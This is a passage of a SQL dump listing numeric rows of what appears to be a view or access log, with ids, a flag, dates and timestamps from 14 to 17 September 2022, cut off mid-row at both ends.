22:50:15'),(59056,1766,1,'2022-09-14','2022-09-14 23:30:41'),(59057,1766,1,'2022-09-14','2022-09-14 23:31:23'),(59058,1766,1,'2022-09-14','2022-09-14 23:34:13'),(59059,4591,1,'2022-09-15','2022-09-15 00:10:19'),(59060,5005,1,'2022-09-15','2022-09-15 00:12:31'),(59061,5005,1,'2022-09-15','2022-09-15 00:16:05'),(59062,5005,1,'2022-09-15','2022-09-15 00:19:44'),(59063,5005,1,'2022-09-15','2022-09-15 00:20:20'),(59064,89,1,'2022-09-15','2022-09-15 00:28:41'),(59065,5005,1,'2022-09-15','2022-09-15 00:46:46'),(59066,4448,1,'2022-09-15','2022-09-15 00:51:21'),(59067,4448,1,'2022-09-15','2022-09-15 00:51:35'),(59068,108,1,'2022-09-15','2022-09-15 01:01:21'),(59069,3479,1,'2022-09-15','2022-09-15 01:07:18'),(59070,108,1,'2022-09-15','2022-09-15 01:12:01'),(59071,108,1,'2022-09-15','2022-09-15 01:17:44'),(59072,4941,1,'2022-09-15','2022-09-15 01:26:47'),(59073,5005,1,'2022-09-15','2022-09-15 01:41:32'),(59074,5005,1,'2022-09-15','2022-09-15 01:44:06'),(59075,2769,1,'2022-09-15','2022-09-15 01:52:23'),(59076,3694,1,'2022-09-15','2022-09-15 01:53:35'),(59077,1586,1,'2022-09-15','2022-09-15 01:56:07'),(59078,4335,1,'2022-09-15','2022-09-15 02:14:48'),(59079,5005,1,'2022-09-15','2022-09-15 02:44:10'),(59080,4642,1,'2022-09-15','2022-09-15 04:07:21'),(59081,4642,1,'2022-09-15','2022-09-15 04:07:23'),(59082,5005,1,'2022-09-15','2022-09-15 04:13:08'),(59083,5005,1,'2022-09-15','2022-09-15 07:07:18'),(59084,5005,1,'2022-09-15','2022-09-15 07:27:38'),(59085,4416,1,'2022-09-15','2022-09-15 08:05:45'),(59086,5005,1,'2022-09-15','2022-09-15 09:10:57'),(59087,2503,1,'2022-09-15','2022-09-15 09:39:59'),(59088,1600,1,'2022-09-15','2022-09-15 10:55:59'),(59089,5005,1,'2022-09-15','2022-09-15 11:07:31'),(59090,2769,1,'2022-09-15','2022-09-15 11:13:49'),(59091,5005,1,'2022-09-15','2022-09-15 11:55:01'),(59092,1544,1,'2022-09-15','2022-09-15 12:00:16'),(59093,87,1,'2022-09-15','2022-09-15 12:06:09'),(59094,5005,1,'2022-09-15','2022-09-15 12:11:08'),(59095,1582,1,'2022-09-15','2022-09-15 12:17:31'),(59096,89,1,'2022-09-15','2022-09-15 12:18:05'),(59097,1586,1,'2022-09-15','2022-09-15 12:18:25'),(59098,3109,1,'2022-09-15','2022-09-15 12:57:00'),(59099,3109,1,'2022-09-15','2022-09-15 12:57:02'),(59100,470,1,'2022-09-15','2022-09-15 12:57:09'),(59101,5005,1,'2022-09-15','2022-09-15 13:03:52'),(59102,5005,1,'2022-09-15','2022-09-15 13:24:39'),(59103,5005,1,'2022-09-15','2022-09-15 13:34:19'),(59104,1602,1,'2022-09-15','2022-09-15 13:35:32'),(59105,2904,1,'2022-09-15','2022-09-15 13:36:30'),(59106,4960,1,'2022-09-15','2022-09-15 13:43:52'),(59107,4960,1,'2022-09-15','2022-09-15 13:44:56'),(59108,4960,1,'2022-09-15','2022-09-15 13:49:06'),(59109,5005,1,'2022-09-15','2022-09-15 14:04:48'),(59110,5005,1,'2022-09-15','2022-09-15 14:11:29'),(59111,5005,1,'2022-09-15','2022-09-15 14:12:11'),(59112,3731,1,'2022-09-15','2022-09-15 14:22:38'),(59113,3226,1,'2022-09-15','2022-09-15 14:27:26'),(59114,91,1,'2022-09-15','2022-09-15 14:28:24'),(59115,89,1,'2022-09-15','2022-09-15 14:29:26'),(59116,1608,1,'2022-09-15','2022-09-15 14:42:53'),(59117,1608,1,'2022-09-15','2022-09-15 14:43:12'),(59118,1596,1,'2022-09-15','2022-09-15 14:43:53'),(59119,5001,1,'2022-09-15','2022-09-15 14:51:56'),(59120,5005,1,'2022-09-15','2022-09-15 14:52:17'),(59121,5005,1,'2022-09-15','2022-09-15 14:59:10'),(59122,84,1,'2022-09-15','2022-09-15 15:21:21'),(59123,1596,1,'2022-09-15','2022-09-15 15:35:17'),(59124,2769,1,'2022-09-15','2022-09-15 15:54:32'),(59125,5005,1,'2022-09-15','2022-09-15 16:07:01'),(59126,5005,1,'2022-09-15','2022-09-15 16:14:55'),(59127,3063,1,'2022-09-15','2022-09-15 16:18:36'),(59128,3063,1,'2022-09-15','2022-09-15 16:18:43'),(59129,84,1,'2022-09-15','2022-09-15 16:33:20'),(59130,5005,1,'2022-09-15','2022-09-15 17:18:48'),(59131,4983,1,'2022-09-15','2022-09-15 17:42:33'),(59132,1730,1,'2022-09-15','2022-09-15 18:01:03'),(59133,1544,1,'2022-09-15','2022-09-15 18:10:50'),(59134,1582,1,'2022-09-15','2022-09-15 20:35:48'),(59135,1582,1,'2022-09-15','2022-09-15 20:35:50'),(59136,4845,1,'2022-09-15','2022-09-15 20:46:59'),(59137,4996,1,'2022-09-15','2022-09-15 21:15:57'),(59138,1594,1,'2022-09-15','2022-09-15 21:33:47'),(59139,1594,1,'2022-09-15','2022-09-15 21:34:00'),(59140,2769,1,'2022-09-15','2022-09-15 21:54:29'),(59141,2457,1,'2022-09-15','2022-09-15 21:58:00'),(59142,472,1,'2022-09-15','2022-09-15 22:39:27'),(59143,1778,1,'2022-09-15','2022-09-15 22:51:54'),(59144,4654,1,'2022-09-15','2022-09-15 23:24:26'),(59145,469,1,'2022-09-16','2022-09-16 00:24:39'),(59146,91,1,'2022-09-16','2022-09-16 01:22:42'),(59147,91,1,'2022-09-16','2022-09-16 01:31:21'),(59148,91,1,'2022-09-16','2022-09-16 01:39:02'),(59149,5028,1,'2022-09-16','2022-09-16 01:39:55'),(59150,5028,1,'2022-09-16','2022-09-16 01:39:56'),(59151,91,1,'2022-09-16','2022-09-16 01:40:23'),(59152,89,1,'2022-09-16','2022-09-16 01:44:39'),(59153,1544,1,'2022-09-16','2022-09-16 01:47:05'),(59154,89,1,'2022-09-16','2022-09-16 01:56:45'),(59155,89,1,'2022-09-16','2022-09-16 01:57:08'),(59156,89,1,'2022-09-16','2022-09-16 01:57:21'),(59157,5033,1,'2022-09-16','2022-09-16 01:57:35'),(59158,89,1,'2022-09-16','2022-09-16 01:58:02'),(59159,91,1,'2022-09-16','2022-09-16 02:07:07'),(59160,4420,1,'2022-09-16','2022-09-16 02:39:03'),(59161,4416,1,'2022-09-16','2022-09-16 02:39:44'),(59162,1614,1,'2022-09-16','2022-09-16 02:47:36'),(59163,4238,1,'2022-09-16','2022-09-16 03:25:50'),(59164,91,1,'2022-09-16','2022-09-16 04:28:09'),(59165,4654,1,'2022-09-16','2022-09-16 04:35:16'),(59166,1592,1,'2022-09-16','2022-09-16 05:02:12'),(59167,4976,1,'2022-09-16','2022-09-16 05:22:21'),(59168,4976,1,'2022-09-16','2022-09-16 05:23:16'),(59169,1544,1,'2022-09-16','2022-09-16 05:25:23'),(59170,5005,1,'2022-09-16','2022-09-16 06:15:57'),(59171,467,1,'2022-09-16','2022-09-16 06:55:19'),(59172,467,1,'2022-09-16','2022-09-16 06:55:21'),(59173,4648,1,'2022-09-16','2022-09-16 06:56:53'),(59174,89,1,'2022-09-16','2022-09-16 07:32:45'),(59175,1588,1,'2022-09-16','2022-09-16 07:32:59'),(59176,89,1,'2022-09-16','2022-09-16 07:33:36'),(59177,1584,1,'2022-09-16','2022-09-16 07:33:52'),(59178,89,1,'2022-09-16','2022-09-16 07:34:12'),(59179,1590,1,'2022-09-16','2022-09-16 07:34:30'),(59180,89,1,'2022-09-16','2022-09-16 07:34:52'),(59181,1584,1,'2022-09-16','2022-09-16 07:34:59'),(59182,89,1,'2022-09-16','2022-09-16 07:38:02'),(59183,1602,1,'2022-09-16','2022-09-16 07:38:16'),(59184,1594,1,'2022-09-16','2022-09-16 08:18:30'),(59185,1612,1,'2022-09-16','2022-09-16 08:25:50'),(59186,1608,1,'2022-09-16','2022-09-16 08:35:32'),(59187,1608,1,'2022-09-16','2022-09-16 08:36:07'),(59188,1588,1,'2022-09-16','2022-09-16 08:37:55'),(59189,87,1,'2022-09-16','2022-09-16 08:39:19'),(59190,470,1,'2022-09-16','2022-09-16 08:39:59'),(59191,4329,1,'2022-09-16','2022-09-16 08:42:47'),(59192,1582,1,'2022-09-16','2022-09-16 08:48:50'),(59193,89,1,'2022-09-16','2022-09-16 08:49:54'),(59194,89,1,'2022-09-16','2022-09-16 08:50:23'),(59195,3006,1,'2022-09-16','2022-09-16 08:50:53'),(59196,89,1,'2022-09-16','2022-09-16 08:51:21'),(59197,89,1,'2022-09-16','2022-09-16 08:51:35'),(59198,89,1,'2022-09-16','2022-09-16 08:51:42'),(59199,1614,1,'2022-09-16','2022-09-16 08:51:50'),(59200,1739,1,'2022-09-16','2022-09-16 10:18:42'),(59201,87,1,'2022-09-16','2022-09-16 10:26:48'),(59202,91,1,'2022-09-16','2022-09-16 10:29:59'),(59203,91,1,'2022-09-16','2022-09-16 10:37:44'),(59204,91,1,'2022-09-16','2022-09-16 10:39:14'),(59205,91,1,'2022-09-16','2022-09-16 10:46:26'),(59206,4930,1,'2022-09-16','2022-09-16 10:47:13'),(59207,4911,1,'2022-09-16','2022-09-16 10:48:12'),(59208,4930,1,'2022-09-16','2022-09-16 10:48:33'),(59209,4930,1,'2022-09-16','2022-09-16 10:48:43'),(59210,84,1,'2022-09-16','2022-09-16 10:48:43'),(59211,4944,1,'2022-09-16','2022-09-16 10:48:54'),(59212,87,1,'2022-09-16','2022-09-16 10:49:05'),(59213,482,1,'2022-09-16','2022-09-16 10:49:18'),(59214,87,1,'2022-09-16','2022-09-16 10:49:30'),(59215,471,1,'2022-09-16','2022-09-16 10:49:45'),(59216,4930,1,'2022-09-16','2022-09-16 10:50:00'),(59217,87,1,'2022-09-16','2022-09-16 10:50:00'),(59218,486,1,'2022-09-16','2022-09-16 10:50:08'),(59219,87,1,'2022-09-16','2022-09-16 10:50:21'),(59220,76,1,'2022-09-16','2022-09-16 10:50:27'),(59221,468,1,'2022-09-16','2022-09-16 10:50:31'),(59222,87,1,'2022-09-16','2022-09-16 10:50:39'),(59223,89,1,'2022-09-16','2022-09-16 10:50:49'),(59224,1602,1,'2022-09-16','2022-09-16 10:51:31'),(59225,89,1,'2022-09-16','2022-09-16 10:53:23'),(59226,89,1,'2022-09-16','2022-09-16 10:53:41'),(59227,4368,1,'2022-09-16','2022-09-16 10:53:41'),(59228,89,1,'2022-09-16','2022-09-16 10:53:57'),(59229,89,1,'2022-09-16','2022-09-16 10:54:10'),(59230,472,1,'2022-09-16','2022-09-16 10:54:26'),(59231,472,1,'2022-09-16','2022-09-16 10:54:29'),(59232,4930,1,'2022-09-16','2022-09-16 10:55:03'),(59233,4966,1,'2022-09-16','2022-09-16 10:55:20'),(59234,4930,1,'2022-09-16','2022-09-16 10:55:26'),(59235,4966,1,'2022-09-16','2022-09-16 10:55:30'),(59236,4966,1,'2022-09-16','2022-09-16 10:55:45'),(59237,4930,1,'2022-09-16','2022-09-16 10:55:46'),(59238,91,1,'2022-09-16','2022-09-16 10:56:06'),(59239,68,1,'2022-09-16','2022-09-16 10:58:30'),(59240,76,1,'2022-09-16','2022-09-16 10:58:58'),(59241,72,1,'2022-09-16','2022-09-16 11:00:03'),(59242,91,1,'2022-09-16','2022-09-16 11:00:32'),(59243,335,1,'2022-09-16','2022-09-16 11:00:37'),(59244,108,1,'2022-09-16','2022-09-16 11:00:58'),(59245,2503,1,'2022-09-16','2022-09-16 11:01:37'),(59246,80,1,'2022-09-16','2022-09-16 11:03:24'),(59247,2503,1,'2022-09-16','2022-09-16 11:04:43'),(59248,91,1,'2022-09-16','2022-09-16 11:08:17'),(59249,91,1,'2022-09-16','2022-09-16 11:20:49'),(59250,91,1,'2022-09-16','2022-09-16 11:31:39'),(59251,89,1,'2022-09-16','2022-09-16 11:34:52'),(59252,1544,1,'2022-09-16','2022-09-16 11:35:56'),(59253,89,1,'2022-09-16','2022-09-16 11:42:36'),(59254,89,1,'2022-09-16','2022-09-16 11:43:30'),(59255,1614,1,'2022-09-16','2022-09-16 11:45:29'),(59256,89,1,'2022-09-16','2022-09-16 11:45:36'),(59257,3083,1,'2022-09-16','2022-09-16 11:45:55'),(59258,1872,1,'2022-09-16','2022-09-16 11:49:32'),(59259,1877,1,'2022-09-16','2022-09-16 11:50:51'),(59260,1745,1,'2022-09-16','2022-09-16 11:51:12'),(59261,1870,1,'2022-09-16','2022-09-16 11:52:15'),(59262,89,1,'2022-09-16','2022-09-16 11:52:24'),(59263,89,1,'2022-09-16','2022-09-16 11:52:55'),(59264,89,1,'2022-09-16','2022-09-16 11:53:34'),(59265,4930,1,'2022-09-16','2022-09-16 11:53:39'),(59266,4941,1,'2022-09-16','2022-09-16 11:53:59'),(59267,89,1,'2022-09-16','2022-09-16 11:54:00'),(59268,89,1,'2022-09-16','2022-09-16 11:54:17'),(59269,4930,1,'2022-09-16','2022-09-16 11:54:29'),(59270,2503,1,'2022-09-16','2022-09-16 11:54:42'),(59271,1588,1,'2022-09-16','2022-09-16 11:54:44'),(59272,91,1,'2022-09-16','2022-09-16 11:54:52'),(59273,4930,1,'2022-09-16','2022-09-16 11:58:53'),(59274,4941,1,'2022-09-16','2022-09-16 11:59:07'),(59275,1588,1,'2022-09-16','2022-09-16 12:04:32'),(59276,89,1,'2022-09-16','2022-09-16 12:04:33'),(59277,84,1,'2022-09-16','2022-09-16 12:04:44'),(59278,84,1,'2022-09-16','2022-09-16 12:04:46'),(59279,84,1,'2022-09-16','2022-09-16 12:04:52'),(59280,84,1,'2022-09-16','2022-09-16 12:04:55'),(59281,3691,1,'2022-09-16','2022-09-16 12:05:10'),(59282,4930,1,'2022-09-16','2022-09-16 12:05:33'),(59283,91,1,'2022-09-16','2022-09-16 12:05:37'),(59284,1751,1,'2022-09-16','2022-09-16 12:05:59'),(59285,4930,1,'2022-09-16','2022-09-16 12:06:06'),(59286,1751,1,'2022-09-16','2022-09-16 12:06:16'),(59287,1870,1,'2022-09-16','2022-09-16 12:06:17'),(59288,89,1,'2022-09-16','2022-09-16 12:06:19'),(59289,87,1,'2022-09-16','2022-09-16 12:06:27'),(59290,87,1,'2022-09-16','2022-09-16 12:06:27'),(59291,87,1,'2022-09-16','2022-09-16 12:06:33'),(59292,1606,1,'2022-09-16','2022-09-16 12:06:51'),(59293,87,1,'2022-09-16','2022-09-16 12:07:01'),(59294,87,1,'2022-09-16','2022-09-16 12:07:04'),(59295,486,1,'2022-09-16','2022-09-16 12:07:06'),(59296,486,1,'2022-09-16','2022-09-16 12:07:12'),(59297,87,1,'2022-09-16','2022-09-16 12:07:20'),(59298,87,1,'2022-09-16','2022-09-16 12:07:22'),(59299,480,1,'2022-09-16','2022-09-16 12:07:31'),(59300,480,1,'2022-09-16','2022-09-16 12:07:32'),(59301,480,1,'2022-09-16','2022-09-16 12:07:41'),(59302,87,1,'2022-09-16','2022-09-16 12:07:42'),(59303,468,1,'2022-09-16','2022-09-16 12:07:55'),(59304,87,1,'2022-09-16','2022-09-16 12:08:06'),(59305,87,1,'2022-09-16','2022-09-16 12:08:06'),(59306,488,1,'2022-09-16','2022-09-16 12:08:10'),(59307,87,1,'2022-09-16','2022-09-16 12:08:14'),(59308,484,1,'2022-09-16','2022-09-16 12:08:21'),(59309,1751,1,'2022-09-16','2022-09-16 12:08:22'),(59310,87,1,'2022-09-16','2022-09-16 12:08:23'),(59311,89,1,'2022-09-16','2022-09-16 12:08:29'),(59312,87,1,'2022-09-16','2022-09-16 12:08:29'),(59313,89,1,'2022-09-16','2022-09-16 12:08:37'),(59314,89,1,'2022-09-16','2022-09-16 12:08:58'),(59315,89,1,'2022-09-16','2022-09-16 12:08:59'),(59316,4930,1,'2022-09-16','2022-09-16 12:09:04'),(59317,1606,1,'2022-09-16','2022-09-16 12:09:07'),(59318,1586,1,'2022-09-16','2022-09-16 12:09:14'),(59319,1586,1,'2022-09-16','2022-09-16 12:09:19'),(59320,89,1,'2022-09-16','2022-09-16 12:09:28'),(59321,1751,1,'2022-09-16','2022-09-16 12:09:35'),(59322,89,1,'2022-09-16','2022-09-16 12:09:47'),(59323,1751,1,'2022-09-16','2022-09-16 12:10:01'),(59324,89,1,'2022-09-16','2022-09-16 12:10:05'),(59325,1751,1,'2022-09-16','2022-09-16 12:10:10'),(59326,89,1,'2022-09-16','2022-09-16 12:10:16'),(59327,89,1,'2022-09-16','2022-09-16 12:10:20'),(59328,4930,1,'2022-09-16','2022-09-16 12:10:21'),(59329,1588,1,'2022-09-16','2022-09-16 12:10:26'),(59330,89,1,'2022-09-16','2022-09-16 12:10:33'),(59331,89,1,'2022-09-16','2022-09-16 12:10:56'),(59332,1751,1,'2022-09-16','2022-09-16 12:11:44'),(59333,1751,1,'2022-09-16','2022-09-16 12:11:52'),(59334,89,1,'2022-09-16','2022-09-16 12:11:59'),(59335,89,1,'2022-09-16','2022-09-16 12:12:07'),(59336,4930,1,'2022-09-16','2022-09-16 12:12:38'),(59337,4911,1,'2022-09-16','2022-09-16 12:13:19'),(59338,4930,1,'2022-09-16','2022-09-16 12:13:34'),(59339,4963,1,'2022-09-16','2022-09-16 12:13:42'),(59340,80,1,'2022-09-16','2022-09-16 12:14:18'),(59341,4930,1,'2022-09-16','2022-09-16 12:14:23'),(59342,89,1,'2022-09-16','2022-09-16 12:15:26'),(59343,91,1,'2022-09-16','2022-09-16 12:16:08'),(59344,1544,1,'2022-09-16','2022-09-16 12:19:23'),(59345,76,1,'2022-09-16','2022-09-16 12:31:28'),(59346,80,1,'2022-09-16','2022-09-16 12:32:12'),(59347,1594,1,'2022-09-16','2022-09-16 12:33:31'),(59348,89,1,'2022-09-16','2022-09-16 12:38:08'),(59349,2411,1,'2022-09-16','2022-09-16 12:39:31'),(59350,91,1,'2022-09-16','2022-09-16 12:42:12'),(59351,2503,1,'2022-09-16','2022-09-16 12:42:43'),(59352,2503,1,'2022-09-16','2022-09-16 12:43:02'),(59353,91,1,'2022-09-16','2022-09-16 12:43:14'),(59354,2503,1,'2022-09-16','2022-09-16 12:43:43'),(59355,89,1,'2022-09-16','2022-09-16 12:43:47'),(59356,89,1,'2022-09-16','2022-09-16 12:44:03'),(59357,89,1,'2022-09-16','2022-09-16 12:44:13'),(59358,89,1,'2022-09-16','2022-09-16 12:44:23'),(59359,89,1,'2022-09-16','2022-09-16 12:44:27'),(59360,87,1,'2022-09-16','2022-09-16 12:44:38'),(59361,1594,1,'2022-09-16','2022-09-16 12:45:30'),(59362,4930,1,'2022-09-16','2022-09-16 12:48:13'),(59363,4911,1,'2022-09-16','2022-09-16 12:48:30'),(59364,4930,1,'2022-09-16','2022-09-16 12:48:53'),(59365,1870,1,'2022-09-16','2022-09-16 12:48:55'),(59366,4938,1,'2022-09-16','2022-09-16 12:49:00'),(59367,91,1,'2022-09-16','2022-09-16 12:49:11'),(59368,4930,1,'2022-09-16','2022-09-16 12:49:35'),(59369,89,1,'2022-09-16','2022-09-16 12:49:43'),(59370,4930,1,'2022-09-16','2022-09-16 12:49:45'),(59371,91,1,'2022-09-16','2022-09-16 12:49:53'),(59372,4944,1,'2022-09-16','2022-09-16 12:49:55'),(59373,91,1,'2022-09-16','2022-09-16 12:50:04'),(59374,4930,1,'2022-09-16','2022-09-16 12:50:09'),(59375,72,1,'2022-09-16','2022-09-16 12:50:25'),(59376,4893,1,'2022-09-16','2022-09-16 12:50:39'),(59377,5005,1,'2022-09-16','2022-09-16 12:51:15'),(59378,80,1,'2022-09-16','2022-09-16 12:53:03'),(59379,2769,1,'2022-09-16','2022-09-16 12:54:28'),(59380,72,1,'2022-09-16','2022-09-16 12:54:46'),(59381,4930,1,'2022-09-16','2022-09-16 12:54:48'),(59382,89,1,'2022-09-16','2022-09-16 12:54:57'),(59383,68,1,'2022-09-16','2022-09-16 12:55:20'),(59384,1594,1,'2022-09-16','2022-09-16 12:55:23'),(59385,89,1,'2022-09-16','2022-09-16 12:55:32'),(59386,1588,1,'2022-09-16','2022-09-16 12:55:46'),(59387,89,1,'2022-09-16','2022-09-16 12:55:59'),(59388,91,1,'2022-09-16','2022-09-16 12:56:01'),(59389,89,1,'2022-09-16','2022-09-16 12:56:17'),(59390,91,1,'2022-09-16','2022-09-16 12:56:40'),(59391,91,1,'2022-09-16','2022-09-16 12:57:11'),(59392,5005,1,'2022-09-16','2022-09-16 12:57:18'),(59393,1594,1,'2022-09-16','2022-09-16 12:57:39'),(59394,89,1,'2022-09-16','2022-09-16 12:57:53'),(59395,1594,1,'2022-09-16','2022-09-16 12:57:56'),(59396,89,1,'2022-09-16','2022-09-16 13:01:42'),(59397,4930,1,'2022-09-16','2022-09-16 13:18:15'),(59398,4960,1,'2022-09-16','2022-09-16 13:19:01'),(59399,87,1,'2022-09-16','2022-09-16 13:19:55'),(59400,486,1,'2022-09-16','2022-09-16 13:24:49'),(59401,89,1,'2022-09-16','2022-09-16 13:25:12'),(59402,1596,1,'2022-09-16','2022-09-16 13:25:47'),(59403,89,1,'2022-09-16','2022-09-16 13:26:10'),(59404,1598,1,'2022-09-16','2022-09-16 13:26:16'),(59405,89,1,'2022-09-16','2022-09-16 13:27:09'),(59406,1600,1,'2022-09-16','2022-09-16 13:27:23'),(59407,4930,1,'2022-09-16','2022-09-16 13:29:13'),(59408,2503,1,'2022-09-16','2022-09-16 13:33:06'),(59409,89,1,'2022-09-16','2022-09-16 13:49:39'),(59410,4400,1,'2022-09-16','2022-09-16 13:58:48'),(59411,4960,1,'2022-09-16','2022-09-16 14:04:05'),(59412,87,1,'2022-09-16','2022-09-16 14:41:41'),(59413,1870,1,'2022-09-16','2022-09-16 14:41:50'),(59414,1872,1,'2022-09-16','2022-09-16 14:42:41'),(59415,80,1,'2022-09-16','2022-09-16 14:52:28'),(59416,4883,1,'2022-09-16','2022-09-16 14:54:27'),(59417,1870,1,'2022-09-16','2022-09-16 14:55:06'),(59418,1877,1,'2022-09-16','2022-09-16 14:58:50'),(59419,91,1,'2022-09-16','2022-09-16 15:02:41'),(59420,76,1,'2022-09-16','2022-09-16 15:02:52'),(59421,4391,1,'2022-09-16','2022-09-16 15:11:31'),(59422,1722,1,'2022-09-16','2022-09-16 15:13:32'),(59423,1722,1,'2022-09-16','2022-09-16 15:14:29'),(59424,1608,1,'2022-09-16','2022-09-16 15:53:24'),(59425,80,1,'2022-09-16','2022-09-16 15:57:23'),(59426,68,1,'2022-09-16','2022-09-16 15:57:33'),(59427,2154,1,'2022-09-16','2022-09-16 16:07:33'),(59428,89,1,'2022-09-16','2022-09-16 16:08:03'),(59429,89,1,'2022-09-16','2022-09-16 16:08:39'),(59430,1612,1,'2022-09-16','2022-09-16 16:54:27'),(59431,1612,1,'2022-09-16','2022-09-16 16:54:29'),(59432,2159,1,'2022-09-16','2022-09-16 17:09:15'),(59433,2159,1,'2022-09-16','2022-09-16 17:09:18'),(59434,1606,1,'2022-09-16','2022-09-16 17:24:30'),(59435,1606,1,'2022-09-16','2022-09-16 17:24:57'),(59436,1606,1,'2022-09-16','2022-09-16 17:25:39'),(59437,2063,1,'2022-09-16','2022-09-16 17:49:19'),(59438,84,1,'2022-09-16','2022-09-16 18:08:46'),(59439,1870,1,'2022-09-16','2022-09-16 18:10:55'),(59440,84,1,'2022-09-16','2022-09-16 18:11:30'),(59441,1612,1,'2022-09-16','2022-09-16 18:24:25'),(59442,1772,1,'2022-09-16','2022-09-16 18:50:21'),(59443,472,1,'2022-09-16','2022-09-16 18:54:27'),(59444,472,1,'2022-09-16','2022-09-16 18:54:29'),(59445,3066,1,'2022-09-16','2022-09-16 19:43:22'),(59446,3066,1,'2022-09-16','2022-09-16 19:43:24'),(59447,5005,1,'2022-09-16','2022-09-16 20:32:17'),(59448,5005,1,'2022-09-16','2022-09-16 20:32:21'),(59449,4941,1,'2022-09-16','2022-09-16 20:40:43'),(59450,1544,1,'2022-09-16','2022-09-16 20:56:47'),(59451,570,1,'2022-09-16','2022-09-16 21:55:45'),(59452,4762,1,'2022-09-16','2022-09-16 22:08:21'),(59453,4524,1,'2022-09-16','2022-09-16 22:44:53'),(59454,91,1,'2022-09-16','2022-09-16 23:08:30'),(59455,570,1,'2022-09-16','2022-09-16 23:21:05'),(59456,4738,1,'2022-09-16','2022-09-16 23:26:53'),(59457,91,1,'2022-09-16','2022-09-16 23:42:13'),(59458,5033,1,'2022-09-17','2022-09-17 00:15:32'),(59459,5033,1,'2022-09-17','2022-09-17 00:15:37'),(59460,2769,1,'2022-09-17','2022-09-17 00:50:41'),(59461,4612,1,'2022-09-17','2022-09-17 01:27:00'),(59462,4983,1,'2022-09-17','2022-09-17 01:56:17'),(59463,4983,1,'2022-09-17','2022-09-17 01:57:07'),(59464,1606,1,'2022-09-17','2022-09-17 02:29:53'),(59465,1606,1,'2022-09-17','2022-09-17 02:34:00'),(59466,68,1,'2022-09-17','2022-09-17 03:18:39'),(59467,2159,1,'2022-09-17','2022-09-17 03:33:13'),(59468,5067,1,'2022-09-17','2022-09-17 03:42:09'),(59469,1600,1,'2022-09-17','2022-09-17 03:49:16'),(59470,3721,1,'2022-09-17','2022-09-17 03:52:15'),(59471,3721,1,'2022-09-17','2022-09-17 03:52:16'),(59472,1749,1,'2022-09-17','2022-09-17 03:54:15'),(59473,1749,1,'2022-09-17','2022-09-17 03:55:12'),(59474,1749,1,'2022-09-17','2022-09-17 03:55:17'),(59475,1749,1,'2022-09-17','2022-09-17 03:55:38'),(59476,3034,1,'2022-09-17','2022-09-17 04:02:48'),(59477,2159,1,'2022-09-17','2022-09-17 04:17:23'),(59478,2159,1,'2022-09-17','2022-09-17 04:17:25'),(59479,4941,1,'2022-09-17','2022-09-17 04:37:15'),(59480,3063,1,'2022-09-17','2022-09-17 04:58:49'),(59481,1772,1,'2022-09-17','2022-09-17 05:08:39'),(59482,1703,1,'2022-09-17','2022-09-17 05:22:17'),(59483,1703,1,'2022-09-17','2022-09-17 05:22:20'),(59484,5054,1,'2022-09-17','2022-09-17 06:25:15'),(59485,1544,1,'2022-09-17','2022-09-17 07:24:22'),(59486,1544,1,'2022-09-17','2022-09-17 07:24:23'),(59487,1608,1,'2022-09-17','2022-09-17 07:24:28'),(59488,1586,1,'2022-09-17','2022-09-17 07:56:43'),(59489,1544,1,'2022-09-17','2022-09-17 08:09:20'),(59490,3030,1,'2022-09-17','2022-09-17 08:22:04'),(59491,1594,1,'2022-09-17','2022-09-17 08:50:50'),(59492,1728,1,'2022-09-17','2022-09-17 08:52:02'),(59493,1728,1,'2022-09-17','2022-09-17 08:52:18'),(59494,1728,1,'2022-09-17','2022-09-17 08:52:47'),(59495,1728,1,'2022-09-17','2022-09-17 08:53:07'),(59496,1544,1,'2022-09-17','2022-09-17 08:54:22'),(59497,80,1,'2022-09-17','2022-09-17 09:14:23'),(59498,1600,1,'2022-09-17','2022-09-17 09:15:47'),(59499,80,1,'2022-09-17','2022-09-17 09:16:04'),(59500,80,1,'2022-09-17','2022-09-17 09:17:22'),(59501,80,1,'2022-09-17','2022-09-17 09:17:26'),(59502,91,1,'2022-09-17','2022-09-17 09:32:00'),(59503,4930,1,'2022-09-17','2022-09-17 09:35:13'),(59504,68,1,'2022-09-17','2022-09-17 10:07:22'),(59505,1877,1,'2022-09-17','2022-09-17 10:09:27'),(59506,2457,1,'2022-09-17','2022-09-17 10:28:24'),(59507,4622,1,'2022-09-17','2022-09-17 10:40:28'),(59508,1594,1,'2022-09-17','2022-09-17 10:57:49'),(59509,89,1,'2022-09-17','2022-09-17 11:25:30'),(59510,2503,1,'2022-09-17','2022-09-17 11:26:19'),(59511,2503,1,'2022-09-17','2022-09-17 11:32:35'),(59512,4444,1,'2022-09-17','2022-09-17 12:25:55'),(59513,5001,1,'2022-09-17','2022-09-17 12:52:52'),(59514,1600,1,'2022-09-17','2022-09-17 12:56:55'),(59515,4966,1,'2022-09-17','2022-09-17 13:12:52'),(59516,1780,1,'2022-09-17','2022-09-17 13:15:40'),(59517,5001,1,'2022-09-17','2022-09-17 13:26:56'),(59518,2704,1,'2022-09-17','2022-09-17 15:08:29'),(59519,3030,1,'2022-09-17','2022-09-17 15:23:33'),(59520,3030,1,'2022-09-17','2022-09-17 15:23:35'),(59521,3178,1,'2022-09-17','2022-09-17 15:36:06'),(59522,1772,1,'2022-09-17','2022-09-17 15:49:52'),(59523,2956,1,'2022-09-17','2022-09-17 16:03:42'),(59524,1594,1,'2022-09-17','2022-09-17 16:03:57'),(59525,5046,1,'2022-09-17','2022-09-17 16:17:29'),(59526,2503,1,'2022-09-17','2022-09-17 16:45:03'),(59527,2503,1,'2022-09-17','2022-09-17 16:45:11'),(59528,4612,1,'2022-09-17','2022-09-17 16:49:56'),(59529,1699,1,'2022-09-17','2022-09-17 16:58:49'),(59530,1732,1,'2022-09-17','2022-09-17 17:26:33'),(59531,87,1,'2022-09-17','2022-09-17 17:28:19'),(59532,2503,1,'2022-09-17','2022-09-17 17:50:20'),(59533,91,1,'2022-09-17','2022-09-17 17:53:45'),(59534,91,1,'2022-09-17','2022-09-17 17:54:59'),(59535,4436,1,'2022-09-17','2022-09-17 18:22:24'),(59536,102,1,'2022-09-17','2022-09-17 18:37:57'),(59537,102,1,'2022-09-17','2022-09-17 18:37:58'),(59538,4391,1,'2022-09-17','2022-09-17 18:39:30'),(59539,570,1,'2022-09-17','2022-09-17 18:39:34'),(59540,4845,1,'2022-09-17','2022-09-17 19:34:23'),(59541,68,1,'2022-09-17','2022-09-17 19:34:47'),(59542,91,1,'2022-09-17','2022-09-17 19:39:30'),(59543,4845,1,'2022-09-17','2022-09-17 19:52:32'),(59544,4983,1,'2022-09-17','2022-09-17 19:53:15'),(59545,2904,1,'2022-09-17','2022-09-17 